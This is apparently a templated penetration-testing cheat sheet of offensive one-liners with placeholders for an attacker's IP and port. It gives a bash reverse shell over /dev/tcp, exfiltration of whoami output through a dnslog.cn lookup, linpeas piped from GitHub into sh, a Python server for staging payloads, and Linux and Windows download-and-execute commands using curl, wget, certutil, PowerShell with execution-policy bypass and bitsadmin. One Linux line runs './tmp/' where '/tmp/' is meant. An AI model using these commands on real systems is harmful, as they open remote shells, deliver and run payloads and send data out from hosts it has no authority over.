bash -i >& /dev/tcp/{{ ip_address }}/{{ ip_port }} 0>&1 ping -c 1 `whoami`.key.dnslog.cn curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python -m SimpleHTTPServer {{ ip_port }} python3 -m http.server {{ ip_port }}
Linux Download
curl http://{{ ip_address }}:{{ ip_port }}/{{ source_filename }} -o /tmp/{{ target_filename }};chmod +x /tmp/{{ target_filename }};/tmp/{{ target_filename }} wget http://{{ ip_address }}:{{ ip_port }}/{{ source_filename }} -O /tmp/{{ target_filename }} && chmod +x /tmp/{{ target_filename }} && ./tmp/{{ target_filename }}Windows Download
curl http://{{ ip_address }}:{{ ip_port }}/{{ source_filename }}.exe -o C:\\Users\\Public\\{{ target_filename }}.exe certutil -urlcache -split -f http://{{ ip_address }}:{{ ip_port }}/{{ source_filename }}.exe C:\\Users\\Public\\{{ target_filename }}.exe powershell -nop -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://{{ ip_address }}:{{ ip_port }}/{{ source_filename }}.exe','C:\\Users\\Public\\{{ target_filename }}.exe') bitsadmin /transfer myDownLoadJob /download /priority normal http://{{ ip_address }}:{{ ip_port }}/{{ source_filename }}.exe C:\\Users\\Public\\{{ target_filename }}.exe